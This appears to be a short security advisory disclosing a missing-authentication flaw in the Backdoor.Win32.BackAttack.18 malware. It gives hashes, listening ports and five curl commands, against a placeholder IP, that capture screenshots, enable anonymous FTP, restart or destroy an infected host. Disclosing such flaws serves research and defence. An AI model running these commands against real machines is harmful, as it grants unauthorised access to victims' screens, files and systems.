Backdoor.Win32.BackAttack.18 Missing Authentication

Backdoor.Win32.BackAttack.18 malware suffers from a missing authentication vulnerability that can allow for remote screenshots, system restart, and more.

MD5 | 6d3c0dc494872c04ac02bb919738596e

Discovery / credits: Malvuln - (c) 2021
Original source:
Contact: [email protected]

Threat: Backdoor.Win32.BackAttack.18
Vulnerability: Multiple Vulnerabilities
Description: BackAttack.18 (v1.8) listens on TCP ports 80 and 11131. It has remote features you can enable like take screenshot, restart the infected system, enable FTP or even destroy the backdoor. The malware allows these commands to be executed without requiring authentication and the FTP server allows anonymous user logon.
Type: PE32
MD5: c806d23f4343ab40cf897e9c38b5c1c3
Vuln ID: MVID-2021-0084
Dropped files:
Disclosure: 02/11/2021

1) Whos logged on
curl http://x.x.x.x/whoisthere

2) Screen capture
curl http://x.x.x.x/capturescreen

3) Enable FTP
curl http://x.x.x.x/ftpon

4) Restart infected host
curl http://x.x.x.x/restart

5) Destroy the backdoor
curl http://x.x.x.x/destroyyes -v

Destroy action has been executed! -Restart procedure initiated also-

